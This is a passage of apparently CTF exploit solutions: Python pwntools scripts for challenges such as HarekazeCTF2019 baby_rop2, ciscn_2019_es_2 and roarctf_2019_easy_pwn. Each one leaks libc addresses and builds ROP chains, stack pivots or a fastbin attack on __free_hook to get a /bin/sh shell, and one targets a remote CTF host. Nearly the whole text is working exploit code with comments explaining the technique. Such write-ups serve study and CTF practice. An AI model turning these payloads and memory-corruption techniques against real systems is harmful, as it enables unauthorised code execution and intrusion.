libcdata_addr=__libc_start_addr-libc.dump('__libc_start_main')   # libc base
print "libcdata_addr=>",hex(libcdata_addr)

binsh_addr=libcdata_addr+libc.dump('str_bin_sh')
print "binsh_addr=>",hex(binsh_addr)
p.sendlineafter('password:','administrator')
p.sendlineafter(':','1')
# system("/bin/sh") via the PLT; the trailing GOT address is just filler.
payload='A'*76+p32(system_addr)+p32(main_addr)+p32(binsh_addr)+p32(__libc_start_main)
p.sendlineafter('info:',payload)
p.sendlineafter(':','4')
p.interactive()

[HarekazeCTF2019]baby_rop2

from pwn import *

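# [HarekazeCTF2019]baby_rop2: leak __libc_start_main through printf(fmt, got),
# return to main and call system("/bin/sh"). Offsets come from the local
# libc, so this only works when the target runs the same build.
p=process('./babyrop2')
elf=ELF('./babyrop2')
libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
printf_plt=elf.plt['printf']   # call target (PLT stub), not the GOT slot
__libc_start_main=elf.got['__libc_start_main']
pop_rdi_ret=0x0400733
pop_rsi_p15_ret=0x400731
main_addr=0x0400540
# Attach a debugger only when stepping through locally; the original
# unconditional gdb.attach() breaks the script as soon as p is a remote() tube.
#gdb.attach(p)
# 40 bytes reach the saved return address, then
#   printf(0x400770 /* presumably a "%s" format string */, &GOT[__libc_start_main])
# (the p64(0) after the GOT address fills r15 from the pop rsi; pop r15 gadget),
# then main(); the trailing p64(0) is padding.
payload='A'*40+p64(pop_rdi_ret)+p64(0x400770)+p64(pop_rsi_p15_ret)+p64(__libc_start_main)+p64(0)+p64(printf_plt)+p64(main_addr)+p64(0)
p.sendlineafter('name? ',payload)
# The program prints "again, " twice before the leaked pointer.
p.recvuntil('again, ')
p.recvuntil('again, ')
__libc_start_addr=u64(p.recv(6).ljust(8,'\x00'))
print "__libc_start_addr=>",hex(__libc_start_addr)
libcdata_addr=__libc_start_addr-libc.symbols['__libc_start_main']   # libc base
system_addr=libcdata_addr+libc.symbols['system']

binsh_addr=libcdata_addr+libc.search("/bin/sh\x00").next()
print "libcdata_addr=>",hex(libcdata_addr)
print "system_addr=>",hex(system_addr)
print "binsh_addr=>",hex(binsh_addr)
# Round 2: system("/bin/sh").
payload='A'*40+p64(pop_rdi_ret)+p64(binsh_addr)+p64(system_addr)
p.sendlineafter('name? ',payload)

p.interactive()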

ciscn_2019_es_2

from pwn import *

# ciscn_2019_es_2 (32-bit): the overflow is too short for a full ROP chain,
# so leak the saved ebp, build a fake frame inside the buffer and pivot to
# it with leave; ret.
p=remote('node3.buuoj.cn',25311)
#p=process('./ciscn')
elf=ELF('./ciscn')
system_addr=elf.plt['system']
p.recvuntil("name?")

leave_ret=0x080484b8
# 0x27 non-NUL bytes presumably run the name straight into the saved ebp,
# so the echo prints it right after our padding.
payload='A'*0x27
p.sendline(payload)
p.recvline()
p.recvline()
# leaked ebp - 0x38 = start of our buffer (offset found with gdb).
stack_addr=u32(p.recv(4))-0x38
print "stack_addr=>",hex(stack_addr)
p.recvline()
# Fake frame at stack_addr:
#   [0]   value popped into ebp by the second leave (irrelevant)
#   [4]   system@plt      <- reached by the ret after that leave
#   [8]   fake return address for system
#   [12]  pointer to "/bin/sh" at stack_addr+0x10
#   [16]  "/bin/sh\0" + filler
# then the real saved ebp is set to stack_addr and the return address to
# leave; ret: leave moves esp to stack_addr, pops [0], and ret jumps to [4].
payload2=p32(stack_addr+30)+p32(system_addr)+p32(0)+p32(stack_addr+0x10)+'/bin/sh\x00'+'B'*0x10+p32(stack_addr)+p32(leave_ret)
p.sendline(payload2)
p.interactive()

roarctf_2019_easy_pwn

from pwn import *
from LibcSearcher import LibcSearcher

# roarctf_2019_easy_pwn: off-by-one heap overflow (glibc 2.23 style fastbin
# attack on __free_hook).
#context.log_level="debug"
p=process('./roar')
#p=remote('node3.buuoj.cn',27009)
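def add(size):
    """Menu choice 1: allocate ``size`` bytes; returns the slot index the program prints.

    Only one character is read after 'ticket is ', so the result is correct
    for indices 0-9 only (enough for this script, which never exceeds 9).
    """
    p.sendlineafter('choice: ','1')
    p.sendlineafter('size: ',str(size))
    p.recvuntil('ticket is ')
    return p.recv(1)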
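def Write(index,size,content):
    """Menu choice 2: write ``size`` bytes of ``content`` into slot ``index``.

    The program's size check is the bug: the script passes sizes 10 bytes
    over the allocation to reach one byte past the chunk.
    """
    p.sendlineafter('choice: ','2')
    p.sendlineafter('index: ',str(index))
    p.sendlineafter('size: ',str(size))
    p.sendafter('content: ',content)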
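def free(index):
    """Menu choice 3: free slot ``index``."""
    p.sendlineafter('choice: ','3')
    p.sendlineafter('index: ',str(index))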
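def show(index):
    """Menu choice 4: print slot ``index`` (caller parses the 'content: ' output)."""
    p.sendlineafter('choice: ','4')
    p.sendlineafter('index: ',str(index))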
# Chunk layout (slots are reused lowest-free-first, as the indices the
# program prints show):
#   0,1 : 0x20   2 : 0x90   3 : 0x20   4 (a3) : 0x20 holding "/bin/sh"
#   5 : 0x20     6 : 0x50   7 (aaa) : 0x70   8 : 0x20
add(0x18)
add(0x18)
add(0x88)
add(0x18)
a3=add(0x18)
Write(a3,8,'/bin/sh\x00')
add(0x18)#5
add(0x48)
aaa=add(0x68)
add(0x18)
# The write apparently allows size to be 10 over the allocation, reaching
# one byte past the chunk: set chunk 6's size low byte to 0xc1 so that it
# covers 6 and 7 (0x50 + 0x70 = 0xc0).
Write(5,0x18+10,p64(0)*3+'\xc1')
free(6)
free(aaa)
# Reallocate the merged 0xc0 region as "gan"; it overlaps chunk 7.
gan=add(0xb0)


# Same off-by-one on chunk 1: size -> 0xb1 so it covers 1, 2 and 3
# (0x20 + 0x90 + 0x20).
free(3)
payload=p64(0)*3+'\xb1'
Write(0,0x18+10,payload)
free(1)

# a1 is carved from that region (slot 1 again) and overlaps chunk 2.
a1=add(0x98)
# Restore chunk 2's header (0x91) through the overlap, free it into the
# unsorted bin, then read its fd/bk (main_arena+88) from a1.
payload=p64(0)*3+p64(0x91)
Write(1,len(payload),payload)
free(2)
show(a1)
p.recvuntil('content: ')
p.recv(40)
# Despite the name this holds __libc_start_main: unsorted-bin pointer
# (main_arena+88) minus a delta measured on the author's libc
# (3818464 = 0x3a43e0). Only valid for that libc build.
main_arena_addr=u64(p.recv(8))-88-3818464
print "__libc_start_main=>",hex(main_arena_addr)
libc=LibcSearcher('__libc_start_main',main_arena_addr)
libcbase_addr=main_arena_addr-libc.dump('__libc_start_main')
system_addr=libcbase_addr+libc.dump('system')
free_got_addr=libcbase_addr+libc.dump('__free_hook')   # actually __free_hook, not free@got
binsh_addr=libcbase_addr+libc.dump('str_bin_sh')
# Through "gan", rewrite chunk 7 (0x70, in the fastbin): size 0x71 and
# fd = __free_hook-0x33. That fake chunk's size byte (__free_hook-0x2b) will
# be the 0x7f of a libc pointer planted below, which passes the 0x70 fastbin
# size check. The add() takes chunk 7 out, leaving the fake chunk as head.
payload=p64(0)*9+p64(0x71)+p64(free_got_addr-0x33)
Write(gan,len(payload),payload)
add(0x68)

# Put chunk 2 back in shape (size 0x91, fd = main_arena+88,
# bk = __free_hook-0x40) so that allocating it from the unsorted bin stores
# the bin head pointer at bk->fd = __free_hook-0x30 (the 0x7f byte used above).
payload=p64(0)*3+p64(0x91)+p64(main_arena_addr+88+3818464)+p64(free_got_addr-0x40)
Write(a1,len(payload),payload)
add(0x88)
add(0x18)
# This 0x70 allocation returns the fake chunk: data at __free_hook-0x23,
# so 35 filler bytes and then system() lands on __free_hook.
pwnnn=add(0x68)
payload=p64(0)*4+'\x00'*3+p64(system_addr)
Write(pwnnn,len(payload),payload)

# free("/bin/sh") -> system("/bin/sh").
free(a3)
#gdb.attach(p)

p.interactive()